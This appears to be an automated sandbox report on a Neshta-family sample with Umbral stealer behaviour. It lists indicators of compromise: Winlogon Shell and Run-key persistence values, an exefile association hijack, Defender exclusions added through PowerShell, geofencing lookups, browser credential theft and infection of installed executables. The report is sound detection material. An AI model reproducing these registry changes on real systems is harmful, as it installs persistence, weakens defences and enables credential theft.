neshta | a73a05a4b6ec6ae1c1ba6d3d12b68cc52b899e2a6dbbaaa1f48f2c260a733123

Processes:

Bridgesurrogate.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\", \"C:\\Users\\Public\\Libraries\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\", \"C:\\Users\\All Users\\Oracle\\Java\\.oracle_jre_usage\\dllhost.exe\", \"C:\\Users\\Default User\\Synaptics.exe\", \"C:\\MsAgentBrowserdhcp\\Bridgesurrogate.exe\""	Bridgesurrogate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\""	Bridgesurrogate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\", \"C:\\Users\\Public\\Libraries\\RuntimeBroker.exe\""	Bridgesurrogate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\", \"C:\\Users\\Public\\Libraries\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\""	Bridgesurrogate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\", \"C:\\Users\\Public\\Libraries\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\", \"C:\\Users\\All Users\\Oracle\\Java\\.oracle_jre_usage\\dllhost.exe\""	Bridgesurrogate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\", \"C:\\Users\\Public\\Libraries\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\", \"C:\\Users\\All Users\\Oracle\\Java\\.oracle_jre_usage\\dllhost.exe\", \"C:\\Users\\Default User\\Synaptics.exe\""	Bridgesurrogate.exe

Neshta
Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.
persistence spyware neshta

Process spawned unexpected child process 18 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4276	1560	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5040	1560	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4852	1560	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	624	1560	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3316	1560	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3508	1560	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2848	1560	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	208	1560	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	228	1560	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2560	1560	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2332	1560	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	684	1560	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1036	1560	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4436	1560	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4912	1560	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	876	1560	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4276	1560	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1520	1560	schtasks.exe

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Blocklisted process makes network request 2 IoCs

Processes:

cheat.exe

flow pid process

87 3740 cheat.exe
90 3740 cheat.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

4756 powershell.exe
4852 powershell.exe
1628 powershell.exe
3484 powershell.exe
3740 powershell.exe
3012 powershell.exe

flow	pid	process
87	3740	cheat.exe
90	3740	cheat.exe

pid	process
4756	powershell.exe
4852	powershell.exe
1628	powershell.exe
3484	powershell.exe
3740	powershell.exe
3012	powershell.exe

Checks computer location settings 2 TTPs 64 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

cheats.execheats.execheats.execheats.execheats.exe3mb_online_install.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.exeBridgesurrogate.execheats.execheats.execheats.execheats.execheats.exeminecraftfpsmod.exe._cache_minecraftfpsmod.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.exe._cache_Synaptics.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.exeSynaptics.execheats.execheats.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	3mb_online_install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	Bridgesurrogate.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	minecraftfpsmod.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	._cache_minecraftfpsmod.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	._cache_Synaptics.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	Synaptics.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cheats.exe

Executes dropped EXE 64 IoCs

Processes:

3mb_online_install.exeStart.execurl.exeminecraftfpsmod.execheats.execheat.execheats.exesvchost.comcheats.exesvchost.comcheats.exe._cache_minecraftfpsmod.exesvchost.comcheats.exeSynaptics.exesvchost.comcheats.exesvchost.comcheats.exe._cache_Synaptics.exesvchost.comcheats.exesvchost.comcheats.exesvchost.comcheats.exesvchost.comcheats.exeBridgesurrogate.exesvchost.comcheats.exesvchost.comcheats.exesvchost.comcheats.exesvchost.comcheats.exesvchost.comcheats.exeBridgesurrogate.exesvchost.comcheats.exesvchost.comcheats.exesvchost.comcheats.exesvchost.comcheats.exesvchost.comcheats.exesvchost.comcheats.exesvchost.comcheats.exesvchost.comcheats.exesvchost.comcheats.exesvchost.comcheats.exesvchost.comcheats.exesvchost.comcheats.exe

pid	process
2316	3mb_online_install.exe
4856	Start.exe
1508	curl.exe
2792	minecraftfpsmod.exe
1212	cheats.exe
3740	cheat.exe
3640	cheats.exe
2736	svchost.com
3452	cheats.exe
3460	svchost.com
3944	cheats.exe
1172	._cache_minecraftfpsmod.exe
2832	svchost.com
2724	cheats.exe
3096	Synaptics.exe
1824	svchost.com
2064	cheats.exe
1128	svchost.com
5092	cheats.exe
3584	._cache_Synaptics.exe
1972	svchost.com
4460	cheats.exe
4672	svchost.com
712	cheats.exe
3596	svchost.com
5064	cheats.exe
4660	svchost.com
2404	cheats.exe
3460	Bridgesurrogate.exe
2200	svchost.com
4912	cheats.exe
2084	svchost.com
1608	cheats.exe
3484	svchost.com
2980	cheats.exe
2544	svchost.com
1516	cheats.exe
208	svchost.com
5100	cheats.exe
4760	Bridgesurrogate.exe
1940	svchost.com
5076	cheats.exe
536	svchost.com
184	cheats.exe
4212	svchost.com
1736	cheats.exe
1520	svchost.com
2848	cheats.exe
208	svchost.com
3932	cheats.exe
864	svchost.com
3612	cheats.exe
4880	svchost.com
3508	cheats.exe
1608	svchost.com
1496	cheats.exe
4660	svchost.com
1296	cheats.exe
3792	svchost.com
2532	cheats.exe
2032	svchost.com
1468	cheats.exe
3676	svchost.com
184	cheats.exe

Modifies system executable filetype association 2 TTPs 2 IoCs

persistence

Modify Registry

Change Default File Association

T1546.001

Processes:

cheats.execheats.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"	cheats.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"	cheats.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 11 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

Processes:

Bridgesurrogate.exeminecraftfpsmod.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Users\\All Users\\Oracle\\Java\\.oracle_jre_usage\\dllhost.exe\""	Bridgesurrogate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Users\\All Users\\Oracle\\Java\\.oracle_jre_usage\\dllhost.exe\""	Bridgesurrogate.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Synaptics = "\"C:\\Users\\Default User\\Synaptics.exe\""	Bridgesurrogate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\backgroundTaskHost = "\"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\""	Bridgesurrogate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Users\\Public\\Libraries\\RuntimeBroker.exe\""	Bridgesurrogate.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Users\\Public\\Libraries\\RuntimeBroker.exe\""	Bridgesurrogate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Synaptics = "\"C:\\Users\\Default User\\Synaptics.exe\""	Bridgesurrogate.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bridgesurrogate = "\"C:\\MsAgentBrowserdhcp\\Bridgesurrogate.exe\""	Bridgesurrogate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bridgesurrogate = "\"C:\\MsAgentBrowserdhcp\\Bridgesurrogate.exe\""	Bridgesurrogate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\????? = "C:\\ProgramData\\Synaptics\\Synaptics.exe"	minecraftfpsmod.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\backgroundTaskHost = "\"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\""	Bridgesurrogate.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

89 ip-api.com

flow	ioc
89	ip-api.com

Drops file in System32 directory 2 IoCs

Processes:

csc.exe

description	ioc	process
File created	\??\c:\Windows\System32\CSCA605F5B346754640A1C277F4279F9226.TMP	csc.exe
File created	\??\c:\Windows\System32\lhkpi-.exe	csc.exe

Drops file in Program Files directory 64 IoCs

Processes:

cheats.execheats.execheats.exe

description	ioc	process
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~1.EXE	cheats.exe
File opened for modification	C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MIA062~1.EXE	cheats.exe
File opened for modification	C:\PROGRA~2\Google\Update\DISABL~1.EXE	cheats.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\INSTAL~1\setup.exe	cheats.exe
File opened for modification	C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~2.EXE	cheats.exe
File opened for modification	C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MID1AD~1.EXE	cheats.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\wmplayer.exe	cheats.exe
File opened for modification	C:\PROGRA~3\Drivers\Driver.exe	cheats.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{4D8DC~1\VC_RED~1.EXE	cheats.exe
File opened for modification	C:\PROGRA~2\INTERN~1\ExtExport.exe	cheats.exe
File opened for modification	C:\PROGRA~2\INTERN~1\ieinstal.exe	cheats.exe
File opened for modification	C:\PROGRA~2\INTERN~1\iexplore.exe	cheats.exe
File opened for modification	C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\ADOBEA~1.EXE	cheats.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe	cheats.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\BHO\IE_TO_~1.EXE	cheats.exe
File opened for modification	C:\PROGRA~3\Drivers\Driver.exe	cheats.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.371\GOBD5D~1.EXE	cheats.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\msedge.exe	cheats.exe
File opened for modification	C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~4.EXE	cheats.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{57A73~1\VC_RED~1.EXE	cheats.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~1.EXE	cheats.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.371\GO664E~1.EXE	cheats.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{33D1F~1\VCREDI~1.EXE	cheats.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~3.EXE	cheats.exe
File opened for modification	C:\PROGRA~2\INTERN~1\ielowutil.exe	cheats.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\wmlaunch.exe	cheats.exe
File opened for modification	C:\PROGRA~3\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXE	cheats.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\arh.exe	cheats.exe
File opened for modification	C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\AdobeARM.exe	cheats.exe
File opened for modification	C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaw.exe	cheats.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{EF6B0~1\VCREDI~1.EXE	cheats.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~2.EXE	cheats.exe
File opened for modification	C:\PROGRA~2\WI8A19~1\ImagingDevices.exe	cheats.exe
File opened for modification	C:\PROGRA~3\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXE	cheats.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\COOKIE~1.EXE	cheats.exe
File opened for modification	C:\PROGRA~2\WI8A19~1\ImagingDevices.exe	cheats.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE	cheats.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\wmplayer.exe	cheats.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROBR~1.EXE	cheats.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\wmlaunch.exe	cheats.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\wmprph.exe	cheats.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\FULLTR~1.EXE	cheats.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\64BITM~1.EXE	cheats.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~3.EXE	cheats.exe
File opened for modification	C:\PROGRA~2\WINDOW~2\wabmig.exe	cheats.exe
File opened for modification	C:\PROGRA~2\Google\Update\DISABL~1.EXE	cheats.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\MSEDGE~1.EXE	cheats.exe
File opened for modification	C:\PROGRA~3\Drivers\curl.exe	cheats.exe
File opened for modification	C:\PROGRA~2\INTERN~1\ielowutil.exe	cheats.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\Browser\WCCHRO~1\WCCHRO~1.EXE	cheats.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\READER~1.EXE	cheats.exe
File opened for modification	C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\AdobeARM.exe	cheats.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~3.EXE	cheats.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\PWAHEL~1.EXE	cheats.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\wmpshare.exe	cheats.exe
File opened for modification	C:\PROGRA~3\SYNAPT~1\SYNAPT~1.EXE	cheats.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\32BITM~1.EXE	cheats.exe
File opened for modification	C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jaureg.exe	cheats.exe
File opened for modification	C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\java.exe	cheats.exe
File opened for modification	C:\PROGRA~2\MOZILL~1\UNINST~1.EXE	cheats.exe
File opened for modification	C:\PROGRA~3\Drivers\Driver.exe	cheats.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{33D1F~1\VCREDI~1.EXE	cheats.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{CA675~1\VCREDI~1.EXE	cheats.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\setup_wm.exe	cheats.exe

Drops file in Windows directory 64 IoCs

Processes:

cheats.execheats.exesvchost.comcheats.execheats.exesvchost.comcheats.exesvchost.comcheats.exesvchost.comcheats.exesvchost.comcheats.exesvchost.comsvchost.comsvchost.comsvchost.comsvchost.comcheats.exesvchost.comcheats.exesvchost.comcheats.execheats.execheats.execheats.execheats.exesvchost.comsvchost.comcheats.exesvchost.comcheats.execheats.execheats.exesvchost.comsvchost.comsvchost.comcheats.execheats.exesvchost.comsvchost.comcheats.execheats.exesvchost.comsvchost.comcheats.exesvchost.comcheats.exesvchost.comsvchost.comcheats.exesvchost.comsvchost.comcheats.execheats.exesvchost.com

description	ioc	process
File opened for modification	C:\Windows\svchost.com	cheats.exe
File opened for modification	C:\Windows\directx.sys	cheats.exe
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	cheats.exe
File opened for modification	C:\Windows\directx.sys	cheats.exe
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	cheats.exe
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	cheats.exe
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	cheats.exe
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	cheats.exe
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	cheats.exe
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	cheats.exe
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	cheats.exe
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	cheats.exe
File opened for modification	C:\Windows\directx.sys	cheats.exe
File opened for modification	C:\Windows\directx.sys	cheats.exe
File opened for modification	C:\Windows\svchost.com	cheats.exe
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	cheats.exe
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	cheats.exe
File opened for modification	C:\Windows\directx.sys	cheats.exe
